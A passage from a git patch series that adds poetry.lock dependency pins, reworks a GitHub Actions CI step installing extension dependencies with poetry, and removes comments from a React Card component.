+ {file = "tomli-2.2.1-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9316dc65bed1684c9a98ee68759ceaed29d229e985297003e494aa825ebb0281"},
+ {file = "tomli-2.2.1-cp313-cp313-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:e85e99945e688e32d5a35c1ff38ed0b3f41f43fad8df0bdf79f72b2ba7bc5272"},
+ {file = "tomli-2.2.1-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:ac065718db92ca818f8d6141b5f66369833d4a80a9d74435a268c52bdfa73140"},
+ {file = "tomli-2.2.1-cp313-cp313-musllinux_1_2_i686.whl", hash = "sha256:d920f33822747519673ee656a4b6ac33e382eca9d331c87770faa3eef562aeb2"},
+ {file = "tomli-2.2.1-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:a198f10c4d1b1375d7687bc25294306e551bf1abfa4eace6650070a5c1ae2744"},
+ {file = "tomli-2.2.1-cp313-cp313-win32.whl", hash = "sha256:d3f5614314d758649ab2ab3a62d4f2004c825922f9e370b29416484086b264ec"},
+ {file = "tomli-2.2.1-cp313-cp313-win_amd64.whl", hash = "sha256:a38aa0308e754b0e3c67e344754dff64999ff9b513e691d0e786265c93583c69"},
+ {file = "tomli-2.2.1-py3-none-any.whl", hash = "sha256:cb55c73c5f4408779d0cf3eef9f762b9c9f147a77de7b258bef0a5628adc85cc"},
+ {file = "tomli-2.2.1.tar.gz", hash = "sha256:cd45e1dc79c835ce60f7404ec8119f2eb06d38b1deba146f07ced3bbc44505ff"},
+]
+
+[[package]]
+name = "tqdm"
+version = "4.67.1"
+description = "Fast, Extensible Progress Meter"
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "tqdm-4.67.1-py3-none-any.whl", hash = "sha256:26445eca388f82e72884e0d580d5464cd801a3ea01e63e5601bdff9ba6a48de2"},
+ {file = "tqdm-4.67.1.tar.gz", hash = "sha256:f8aef9c52c08c13a65f30ea34f4e5aac3fd1a34959879d7e59e63027286627f2"},
+]
+
+[package.dependencies]
+colorama = {version = "*", markers = "platform_system == \"Windows\""}
+
+[package.extras]
+dev = ["nbval", "pytest (>=6)", "pytest-asyncio (>=0.24)", "pytest-cov", "pytest-timeout"]
+discord = ["requests"]
+notebook = ["ipywidgets (>=6)"]
+slack = ["slack-sdk"]
+telegram = ["requests"]
+
+[[package]]
+name = "transformers"
+version = "4.46.3"
+description = "State-of-the-art Machine Learning for JAX, PyTorch and TensorFlow"
+optional = false
+python-versions = ">=3.8.0"
+files = [
+ {file = "transformers-4.46.3-py3-none-any.whl", hash = "sha256:a12ef6f52841fd190a3e5602145b542d03507222f2c64ebb7ee92e8788093aef"},
+ {file = "transformers-4.46.3.tar.gz", hash = "sha256:8ee4b3ae943fe33e82afff8e837f4b052058b07ca9be3cb5b729ed31295f72cc"},
+]
+
+[package.dependencies]
+filelock = "*"
+huggingface-hub = ">=0.23.2,<1.0"
+numpy = ">=1.17"
+packaging = ">=20.0"
+pyyaml = ">=5.1"
+regex = "!=2019.12.17"
+requests = "*"
+safetensors = ">=0.4.1"
+tokenizers = ">=0.20,<0.21"
+tqdm = ">=4.27"
+
+[package.extras]
+accelerate = ["accelerate (>=0.26.0)"]
+agents = ["Pillow (>=10.0.1,<=15.0)", "accelerate (>=0.26.0)", "datasets (!=2.5.0)", "diffusers", "opencv-python", "sentencepiece (>=0.1.91,!=0.1.92)", "torch"]
+all = ["Pillow (>=10.0.1,<=15.0)", "accelerate (>=0.26.0)", "av (==9.2.0)", "codecarbon (==1.2.0)", "flax (>=0.4.1,<=0.7.0)", "jax (>=0.4.1,<=0.4.13)", "jaxlib (>=0.4.1,<=0.4.13)", "kenlm", "keras-nlp (>=0.3.1,<0.14.0)", "librosa", "onnxconverter-common", "optax (>=0.0.8,<=0.1.4)", "optuna", "phonemizer", "protobuf", "pyctcdecode (>=0.4.0)", "ray[tune] (>=2.7.0)", "scipy (<1.13.0)", "sentencepiece (>=0.1.91,!=0.1.92)", "sigopt", "tensorflow (>2.9,<2.16)", "tensorflow-text (<2.16)", "tf2onnx", "timm (<=0.9.16)", "tokenizers (>=0.20,<0.21)", "torch", "torchaudio", "torchvision"]
+audio = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)"]
+benchmark = ["optimum-benchmark (>=0.3.0)"]
+codecarbon = ["codecarbon (==1.2.0)"]
+deepspeed = ["accelerate (>=0.26.0)", "deepspeed (>=0.9.3)"]
+deepspeed-testing = ["GitPython (<3.1.19)", "accelerate (>=0.26.0)", "beautifulsoup4", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "deepspeed (>=0.9.3)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "nltk (<=3.8.1)", "optuna", "parameterized", "protobuf", "psutil", "pydantic", "pytest (>=7.2.0,<8.0.0)", "pytest-rich", "pytest-timeout", "pytest-xdist", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "ruff (==0.5.1)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "sentencepiece (>=0.1.91,!=0.1.92)", "tensorboard", "timeout-decorator"]
+dev = ["GitPython (<3.1.19)", "Pillow (>=10.0.1,<=15.0)", "accelerate (>=0.26.0)", "av (==9.2.0)", "beautifulsoup4", "codecarbon (==1.2.0)", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "flax (>=0.4.1,<=0.7.0)", "fugashi (>=1.0)", "ipadic (>=1.0.0,<2.0)", "isort (>=5.5.4)", "jax (>=0.4.1,<=0.4.13)", "jaxlib (>=0.4.1,<=0.4.13)", "kenlm", "keras-nlp (>=0.3.1,<0.14.0)", "libcst", "librosa", "nltk (<=3.8.1)", "onnxconverter-common", "optax (>=0.0.8,<=0.1.4)", "optuna", "parameterized", "phonemizer", "protobuf", "psutil", "pyctcdecode (>=0.4.0)", "pydantic", "pytest (>=7.2.0,<8.0.0)", "pytest-rich", "pytest-timeout", "pytest-xdist", "ray[tune] (>=2.7.0)", "rhoknp (>=1.1.0,<1.3.1)", "rich", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "ruff (==0.5.1)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "scikit-learn", "scipy (<1.13.0)", "sentencepiece (>=0.1.91,!=0.1.92)", "sigopt", "sudachidict-core (>=20220729)", "sudachipy (>=0.6.6)", "tensorboard", "tensorflow (>2.9,<2.16)", "tensorflow-text (<2.16)", "tf2onnx", "timeout-decorator", "timm (<=0.9.16)", "tokenizers (>=0.20,<0.21)", "torch", "torchaudio", "torchvision", "unidic (>=1.0.2)", "unidic-lite (>=1.0.7)", "urllib3 (<2.0.0)"]
+dev-tensorflow = ["GitPython (<3.1.19)", "Pillow (>=10.0.1,<=15.0)", "beautifulsoup4", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "isort (>=5.5.4)", "kenlm", "keras-nlp (>=0.3.1,<0.14.0)", "libcst", "librosa", "nltk (<=3.8.1)", "onnxconverter-common", "onnxruntime (>=1.4.0)", "onnxruntime-tools (>=1.4.2)", "parameterized", "phonemizer", "protobuf", "psutil", "pyctcdecode (>=0.4.0)", "pydantic", "pytest (>=7.2.0,<8.0.0)", "pytest-rich", "pytest-timeout", "pytest-xdist", "rich", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "ruff (==0.5.1)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "scikit-learn", "sentencepiece (>=0.1.91,!=0.1.92)", "tensorboard", "tensorflow (>2.9,<2.16)", "tensorflow-text (<2.16)", "tf2onnx", "timeout-decorator", "tokenizers (>=0.20,<0.21)", "urllib3 (<2.0.0)"]
+dev-torch = ["GitPython (<3.1.19)", "Pillow (>=10.0.1,<=15.0)", "accelerate (>=0.26.0)", "beautifulsoup4", "codecarbon (==1.2.0)", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "fugashi (>=1.0)", "ipadic (>=1.0.0,<2.0)", "isort (>=5.5.4)", "kenlm", "libcst", "librosa", "nltk (<=3.8.1)", "onnxruntime (>=1.4.0)", "onnxruntime-tools (>=1.4.2)", "optuna", "parameterized", "phonemizer", "protobuf", "psutil", "pyctcdecode (>=0.4.0)", "pydantic", "pytest (>=7.2.0,<8.0.0)", "pytest-rich", "pytest-timeout", "pytest-xdist", "ray[tune] (>=2.7.0)", "rhoknp (>=1.1.0,<1.3.1)", "rich", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "ruff (==0.5.1)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "scikit-learn", "sentencepiece (>=0.1.91,!=0.1.92)", "sigopt", "sudachidict-core (>=20220729)", "sudachipy (>=0.6.6)", "tensorboard", "timeout-decorator", "timm (<=0.9.16)", "tokenizers (>=0.20,<0.21)", "torch", "torchaudio", "torchvision", "unidic (>=1.0.2)", "unidic-lite (>=1.0.7)", "urllib3 (<2.0.0)"]
+flax = ["flax (>=0.4.1,<=0.7.0)", "jax (>=0.4.1,<=0.4.13)", "jaxlib (>=0.4.1,<=0.4.13)", "optax (>=0.0.8,<=0.1.4)", "scipy (<1.13.0)"]
+flax-speech = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)"]
+ftfy = ["ftfy"]
+integrations = ["optuna", "ray[tune] (>=2.7.0)", "sigopt"]
+ja = ["fugashi (>=1.0)", "ipadic (>=1.0.0,<2.0)", "rhoknp (>=1.1.0,<1.3.1)", "sudachidict-core (>=20220729)", "sudachipy (>=0.6.6)", "unidic (>=1.0.2)", "unidic-lite (>=1.0.7)"]
+modelcreation = ["cookiecutter (==1.7.3)"]
+natten = ["natten (>=0.14.6,<0.15.0)"]
+onnx = ["onnxconverter-common", "onnxruntime (>=1.4.0)", "onnxruntime-tools (>=1.4.2)", "tf2onnx"]
+onnxruntime = ["onnxruntime (>=1.4.0)", "onnxruntime-tools (>=1.4.2)"]
+optuna = ["optuna"]
+quality = ["GitPython (<3.1.19)", "datasets (!=2.5.0)", "isort (>=5.5.4)", "libcst", "rich", "ruff (==0.5.1)", "urllib3 (<2.0.0)"]
+ray = ["ray[tune] (>=2.7.0)"]
+retrieval = ["datasets (!=2.5.0)", "faiss-cpu"]
+ruff = ["ruff (==0.5.1)"]
+sagemaker = ["sagemaker (>=2.31.0)"]
+sentencepiece = ["protobuf", "sentencepiece (>=0.1.91,!=0.1.92)"]
+serving = ["fastapi", "pydantic", "starlette", "uvicorn"]
+sigopt = ["sigopt"]
+sklearn = ["scikit-learn"]
+speech = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)", "torchaudio"]
+testing = ["GitPython (<3.1.19)", "beautifulsoup4", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "nltk (<=3.8.1)", "parameterized", "psutil", "pydantic", "pytest (>=7.2.0,<8.0.0)", "pytest-rich", "pytest-timeout", "pytest-xdist", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "ruff (==0.5.1)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "sentencepiece (>=0.1.91,!=0.1.92)", "tensorboard", "timeout-decorator"]
+tf = ["keras-nlp (>=0.3.1,<0.14.0)", "onnxconverter-common", "tensorflow (>2.9,<2.16)", "tensorflow-text (<2.16)", "tf2onnx"]
+tf-cpu = ["keras (>2.9,<2.16)", "keras-nlp (>=0.3.1,<0.14.0)", "onnxconverter-common", "tensorflow-cpu (>2.9,<2.16)", "tensorflow-probability (<0.24)", "tensorflow-text (<2.16)", "tf2onnx"]
+tf-speech = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)"]
+tiktoken = ["blobfile", "tiktoken"]
+timm = ["timm (<=0.9.16)"]
+tokenizers = ["tokenizers (>=0.20,<0.21)"]
+torch = ["accelerate (>=0.26.0)", "torch"]
+torch-speech = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)", "torchaudio"]
+torch-vision = ["Pillow (>=10.0.1,<=15.0)", "torchvision"]
+torchhub = ["filelock", "huggingface-hub (>=0.23.2,<1.0)", "importlib-metadata", "numpy (>=1.17)", "packaging (>=20.0)", "protobuf", "regex (!=2019.12.17)", "requests", "sentencepiece (>=0.1.91,!=0.1.92)", "tokenizers (>=0.20,<0.21)", "torch", "tqdm (>=4.27)"]
+video = ["av (==9.2.0)"]
+vision = ["Pillow (>=10.0.1,<=15.0)"]
+
+[[package]]
+name = "typing-extensions"
+version = "4.12.2"
+description = "Backported and Experimental Type Hints for Python 3.8+"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "typing_extensions-4.12.2-py3-none-any.whl", hash = "sha256:04e5ca0351e0f3f85c6853954072df659d0d13fac324d0072316b67d7794700d"},
+ {file = "typing_extensions-4.12.2.tar.gz", hash = "sha256:1a7ead55c7e559dd4dee8856e3a88b41225abfe1ce8df57b7c13915fe121ffb8"},
+]
+
+[[package]]
+name = "tzdata"
+version = "2024.2"
+description = "Provider of IANA time zone data"
+optional = false
+python-versions = ">=2"
+files = [
+ {file = "tzdata-2024.2-py2.py3-none-any.whl", hash = "sha256:a48093786cdcde33cad18c2555e8532f34422074448fbc874186f0abd79565cd"},
+ {file = "tzdata-2024.2.tar.gz", hash = "sha256:7d85cc416e9382e69095b7bdf4afd9e3880418a2413feec7069d533d6b4e31cc"},
+]
+
+[[package]]
+name = "urllib3"
+version = "2.2.3"
+description = "HTTP library with thread-safe connection pooling, file post, and more."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "urllib3-2.2.3-py3-none-any.whl", hash = "sha256:ca899ca043dcb1bafa3e262d73aa25c465bfb49e0bd9dd5d59f1d0acba2f8fac"},
+ {file = "urllib3-2.2.3.tar.gz", hash = "sha256:e7d814a81dad81e6caf2ec9fdedb284ecc9c73076b62654547cc64ccdcae26e9"},
+]
+
+[package.extras]
+brotli = ["brotli (>=1.0.9)", "brotlicffi (>=0.8.0)"]
+h2 = ["h2 (>=4,<5)"]
+socks = ["pysocks (>=1.5.6,!=1.5.7,<2.0)"]
+zstd = ["zstandard (>=0.18.0)"]
+
+[[package]]
+name = "virtualenv"
+version = "20.28.1"
+description = "Virtual Python Environment builder"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "virtualenv-20.28.1-py3-none-any.whl", hash = "sha256:412773c85d4dab0409b83ec36f7a6499e72eaf08c80e81e9576bca61831c71cb"},
+ {file = "virtualenv-20.28.1.tar.gz", hash = "sha256:5d34ab240fdb5d21549b76f9e8ff3af28252f5499fb6d6f031adac4e5a8c5329"},
+]
+
+[package.dependencies]
+distlib = ">=0.3.7,<1"
+filelock = ">=3.12.2,<4"
+platformdirs = ">=3.9.1,<5"
+
+[package.extras]
+docs = ["furo (>=2023.7.26)", "proselint (>=0.13)", "sphinx (>=7.1.2,!=7.3)", "sphinx-argparse (>=0.4)", "sphinxcontrib-towncrier (>=0.2.1a0)", "towncrier (>=23.6)"]
+test = ["covdefaults (>=2.3)", "coverage (>=7.2.7)", "coverage-enable-subprocess (>=1)", "flaky (>=3.7)", "packaging (>=23.1)", "pytest (>=7.4)", "pytest-env (>=0.8.2)", "pytest-freezer (>=0.4.8)", "pytest-mock (>=3.11.1)", "pytest-randomly (>=3.12)", "pytest-timeout (>=2.1)", "setuptools (>=68)", "time-machine (>=2.10)"]
+
+[[package]]
+name = "watchdog"
+version = "4.0.2"
+description = "Filesystem events monitoring"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "watchdog-4.0.2-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:ede7f010f2239b97cc79e6cb3c249e72962404ae3865860855d5cbe708b0fd22"},
+ {file = "watchdog-4.0.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:a2cffa171445b0efa0726c561eca9a27d00a1f2b83846dbd5a4f639c4f8ca8e1"},
+ {file = "watchdog-4.0.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:c50f148b31b03fbadd6d0b5980e38b558046b127dc483e5e4505fcef250f9503"},
+ {file = "watchdog-4.0.2-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:7c7d4bf585ad501c5f6c980e7be9c4f15604c7cc150e942d82083b31a7548930"},
+ {file = "watchdog-4.0.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:914285126ad0b6eb2258bbbcb7b288d9dfd655ae88fa28945be05a7b475a800b"},
+ {file = "watchdog-4.0.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:984306dc4720da5498b16fc037b36ac443816125a3705dfde4fd90652d8028ef"},
+ {file = "watchdog-4.0.2-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:1cdcfd8142f604630deef34722d695fb455d04ab7cfe9963055df1fc69e6727a"},
+ {file = "watchdog-4.0.2-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:d7ab624ff2f663f98cd03c8b7eedc09375a911794dfea6bf2a359fcc266bff29"},
+ {file = "watchdog-4.0.2-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:132937547a716027bd5714383dfc40dc66c26769f1ce8a72a859d6a48f371f3a"},
+ {file = "watchdog-4.0.2-cp313-cp313-macosx_10_13_universal2.whl", hash = "sha256:cd67c7df93eb58f360c43802acc945fa8da70c675b6fa37a241e17ca698ca49b"},
+ {file = "watchdog-4.0.2-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:bcfd02377be80ef3b6bc4ce481ef3959640458d6feaae0bd43dd90a43da90a7d"},
+ {file = "watchdog-4.0.2-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:980b71510f59c884d684b3663d46e7a14b457c9611c481e5cef08f4dd022eed7"},
+ {file = "watchdog-4.0.2-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:aa160781cafff2719b663c8a506156e9289d111d80f3387cf3af49cedee1f040"},
+ {file = "watchdog-4.0.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:f6ee8dedd255087bc7fe82adf046f0b75479b989185fb0bdf9a98b612170eac7"},
+ {file = "watchdog-4.0.2-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:0b4359067d30d5b864e09c8597b112fe0a0a59321a0f331498b013fb097406b4"},
+ {file = "watchdog-4.0.2-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:770eef5372f146997638d737c9a3c597a3b41037cfbc5c41538fc27c09c3a3f9"},
+ {file = "watchdog-4.0.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:eeea812f38536a0aa859972d50c76e37f4456474b02bd93674d1947cf1e39578"},
+ {file = "watchdog-4.0.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:b2c45f6e1e57ebb4687690c05bc3a2c1fb6ab260550c4290b8abb1335e0fd08b"},
+ {file = "watchdog-4.0.2-pp310-pypy310_pp73-macosx_10_15_x86_64.whl", hash = "sha256:10b6683df70d340ac3279eff0b2766813f00f35a1d37515d2c99959ada8f05fa"},
+ {file = "watchdog-4.0.2-pp310-pypy310_pp73-macosx_11_0_arm64.whl", hash = "sha256:f7c739888c20f99824f7aa9d31ac8a97353e22d0c0e54703a547a218f6637eb3"},
+ {file = "watchdog-4.0.2-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:c100d09ac72a8a08ddbf0629ddfa0b8ee41740f9051429baa8e31bb903ad7508"},
+ {file = "watchdog-4.0.2-pp38-pypy38_pp73-macosx_11_0_arm64.whl", hash = "sha256:f5315a8c8dd6dd9425b974515081fc0aadca1d1d61e078d2246509fd756141ee"},
+ {file = "watchdog-4.0.2-pp39-pypy39_pp73-macosx_10_15_x86_64.whl", hash = "sha256:2d468028a77b42cc685ed694a7a550a8d1771bb05193ba7b24006b8241a571a1"},
+ {file = "watchdog-4.0.2-pp39-pypy39_pp73-macosx_11_0_arm64.whl", hash = "sha256:f15edcae3830ff20e55d1f4e743e92970c847bcddc8b7509bcd172aa04de506e"},
+ {file = "watchdog-4.0.2-py3-none-manylinux2014_aarch64.whl", hash = "sha256:936acba76d636f70db8f3c66e76aa6cb5136a936fc2a5088b9ce1c7a3508fc83"},
+ {file = "watchdog-4.0.2-py3-none-manylinux2014_armv7l.whl", hash = "sha256:e252f8ca942a870f38cf785aef420285431311652d871409a64e2a0a52a2174c"},
+ {file = "watchdog-4.0.2-py3-none-manylinux2014_i686.whl", hash = "sha256:0e83619a2d5d436a7e58a1aea957a3c1ccbf9782c43c0b4fed80580e5e4acd1a"},
+ {file = "watchdog-4.0.2-py3-none-manylinux2014_ppc64.whl", hash = "sha256:88456d65f207b39f1981bf772e473799fcdc10801062c36fd5ad9f9d1d463a73"},
+ {file = "watchdog-4.0.2-py3-none-manylinux2014_ppc64le.whl", hash = "sha256:32be97f3b75693a93c683787a87a0dc8db98bb84701539954eef991fb35f5fbc"},
+ {file = "watchdog-4.0.2-py3-none-manylinux2014_s390x.whl", hash = "sha256:c82253cfc9be68e3e49282831afad2c1f6593af80c0daf1287f6a92657986757"},
+ {file = "watchdog-4.0.2-py3-none-manylinux2014_x86_64.whl", hash = "sha256:c0b14488bd336c5b1845cee83d3e631a1f8b4e9c5091ec539406e4a324f882d8"},
+ {file = "watchdog-4.0.2-py3-none-win32.whl", hash = "sha256:0d8a7e523ef03757a5aa29f591437d64d0d894635f8a50f370fe37f913ce4e19"},
+ {file = "watchdog-4.0.2-py3-none-win_amd64.whl", hash = "sha256:c344453ef3bf875a535b0488e3ad28e341adbd5a9ffb0f7d62cefacc8824ef2b"},
+ {file = "watchdog-4.0.2-py3-none-win_ia64.whl", hash = "sha256:baececaa8edff42cd16558a639a9b0ddf425f93d892e8392a56bf904f5eff22c"},
+ {file = "watchdog-4.0.2.tar.gz", hash = "sha256:b4dfbb6c49221be4535623ea4474a4d6ee0a9cef4a80b20c28db4d858b64e270"},
+]
+
+[package.extras]
+watchmedo = ["PyYAML (>=3.10)"]
+
+[[package]]
+name = "wheel"
+version = "0.45.1"
+description = "A built-package format for Python"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "wheel-0.45.1-py3-none-any.whl", hash = "sha256:708e7481cc80179af0e556bbf0cc00b8444c7321e2700b8d8580231d13017248"},
+ {file = "wheel-0.45.1.tar.gz", hash = "sha256:661e1abd9198507b1409a20c02106d9670b2576e916d58f520316666abca6729"},
+]
+
+[package.extras]
+test = ["pytest (>=6.0.0)", "setuptools (>=65)"]
+
+[[package]]
+name = "zipp"
+version = "3.20.2"
+description = "Backport of pathlib-compatible object wrapper for zip files"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "zipp-3.20.2-py3-none-any.whl", hash = "sha256:a817ac80d6cf4b23bf7f2828b7cabf326f15a001bea8b1f9b49631780ba28350"},
+ {file = "zipp-3.20.2.tar.gz", hash = "sha256:bc9eb26f4506fda01b81bcde0ca78103b6e62f991b381fec825435c836edbc29"},
+]
+
+[package.extras]
+check = ["pytest-checkdocs (>=2.4)", "pytest-ruff (>=0.2.1)"]
+cover = ["pytest-cov"]
+doc = ["furo", "jaraco.packaging (>=9.3)", "jaraco.tidelift (>=1.4)", "rst.linker (>=1.9)", "sphinx (>=3.5)", "sphinx-lint"]
+enabler = ["pytest-enabler (>=2.2)"]
+test = ["big-O", "importlib-resources", "jaraco.functools", "jaraco.itertools", "jaraco.test", "more-itertools", "pytest (>=6,!=8.1.*)", "pytest-ignore-flaky"]
+type = ["pytest-mypy"]
+
+[extras]
+excel = ["openpyxl"]
+google-sheets = ["beautifulsoup4"]
+
+[metadata]
+lock-version = "2.0"
+python-versions = ">=3.8,<3.9.7 || >3.9.7,<3.12"
+content-hash = "8f347a6563bfe2c9da038562f35002996495fe7e7ee1bef899ff2e93a1948a23"
From 58fcff7ea6f8ad75293876e867805560d4065a3e Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 11:52:18 +0100
Subject: [PATCH 22/58] fix github ci workflow
---
.github/workflows/ci.yml | 12 ++++++------
1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index dff4a8451..2b5ef7038 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -44,7 +44,7 @@ jobs:
if [ -f "$dir/pyproject.toml" ]; then
echo "Installing dependencies for $dir"
cd "$dir"
- poetry install --all-extras --with dev
+ poetry install --all-extras
cd -
fi
done
@@ -54,7 +54,7 @@ jobs:
if [ -f "$dir/pyproject.toml" ]; then
echo "Installing dependencies for $dir"
cd "$dir"
- poetry install --all-extras --with dev
+ poetry install --all-extras
cd -
fi
done
@@ -64,7 +64,7 @@ jobs:
if [ -f "$dir/pyproject.toml" ]; then
echo "Installing dependencies for $dir"
cd "$dir"
- poetry install --all-extras --with dev
+ poetry install --all-extras
cd -
fi
done
@@ -77,7 +77,7 @@ jobs:
if (Test-Path $projFile) {
Write-Host "Installing dependencies for $_"
Push-Location $_.FullName
- poetry install --all-extras --with dev
+ poetry install --all-extras
Pop-Location
}
}
@@ -88,7 +88,7 @@ jobs:
if (Test-Path $projFile) {
Write-Host "Installing dependencies for $_"
Push-Location $_.FullName
- poetry install --all-extras --with dev
+ poetry install --all-extras
Pop-Location
}
}
@@ -99,7 +99,7 @@ jobs:
if (Test-Path $projFile) {
Write-Host "Installing dependencies for $_"
Push-Location $_.FullName
- poetry install --all-extras --with dev
+ poetry install --all-extras
Pop-Location
}
}
From b47f79ed967075f285cfbd27c2f873605ded6c24 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 11:56:30 +0100
Subject: [PATCH 23/58] fix: extension deps installation
---
.github/workflows/ci.yml | 9 +++------
1 file changed, 3 insertions(+), 6 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 2b5ef7038..e57e26698 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -39,8 +39,7 @@ jobs:
run: poetry install --all-extras --with dev --verbose
- name: Install extension dependencies
run: |
- # Install LLM extension dependencies
- for dir in extensions/llms/*/; do
+ for dir in $(find extensions/llms -mindepth 1 -maxdepth 1 -type d); do
if [ -f "$dir/pyproject.toml" ]; then
echo "Installing dependencies for $dir"
cd "$dir"
@@ -49,8 +48,7 @@ jobs:
fi
done
- # Install connector extension dependencies
- for dir in extensions/connectors/*/; do
+ for dir in $(find extensions/connectors -mindepth 1 -maxdepth 1 -type d); do
if [ -f "$dir/pyproject.toml" ]; then
echo "Installing dependencies for $dir"
cd "$dir"
@@ -59,8 +57,7 @@ jobs:
fi
done
- # Install enterprise extension dependencies
- for dir in extensions/ee/*/*/; do
+ for dir in $(find extensions/ee -mindepth 2 -maxdepth 2 -type d); do
if [ -f "$dir/pyproject.toml" ]; then
echo "Installing dependencies for $dir"
cd "$dir"
From ebb83a524b414fab85c26f59938b302efbaad0a7 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 13:35:39 +0100
Subject: [PATCH 24/58] fix: github workflows
---
.github/workflows/ci.yml | 36 +++++++++++-------------------------
1 file changed, 11 insertions(+), 25 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index e57e26698..3c7ee268c 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -39,31 +39,17 @@ jobs:
run: poetry install --all-extras --with dev --verbose
- name: Install extension dependencies
run: |
- for dir in $(find extensions/llms -mindepth 1 -maxdepth 1 -type d); do
- if [ -f "$dir/pyproject.toml" ]; then
- echo "Installing dependencies for $dir"
- cd "$dir"
- poetry install --all-extras
- cd -
- fi
- done
-
- for dir in $(find extensions/connectors -mindepth 1 -maxdepth 1 -type d); do
- if [ -f "$dir/pyproject.toml" ]; then
- echo "Installing dependencies for $dir"
- cd "$dir"
- poetry install --all-extras
- cd -
- fi
- done
-
- for dir in $(find extensions/ee -mindepth 2 -maxdepth 2 -type d); do
- if [ -f "$dir/pyproject.toml" ]; then
- echo "Installing dependencies for $dir"
- cd "$dir"
- poetry install --all-extras
- cd -
- fi
+ find extensions/ -mindepth 1 -type d \( \
+ -path "extensions/llms/*" -o \
+ -path "extensions/connectors/*" -o \
+ -path "extensions/ee/*/*" \) | while read -r dir; do
+ if [ -f "$dir/pyproject.toml" ]; then
+ echo "Installing dependencies for $dir"
+ (
+ cd "$dir" || exit
+ poetry install --all-extras
+ )
+ fi
done
- name: Install extension dependencies (Windows)
if: matrix.os == 'windows-latest'
From 967118ac3fefa9467f4f01e0f0335c82d8fc34b4 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 13:38:45 +0100
Subject: [PATCH 25/58] fix: unnecessary comments
---
client/components/card/index.tsx | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/client/components/card/index.tsx b/client/components/card/index.tsx
index 1d2f61be8..448ff6407 100644
--- a/client/components/card/index.tsx
+++ b/client/components/card/index.tsx
@@ -3,7 +3,7 @@ import React from "react";
function Card(props: {
className?: string;
extra?: string;
- children?: React.ReactNode; // Simplified type
+ children?: React.ReactNode;
default?: boolean;
}) {
const { extra, children, ...rest } = props;
@@ -12,7 +12,7 @@ function Card(props: {
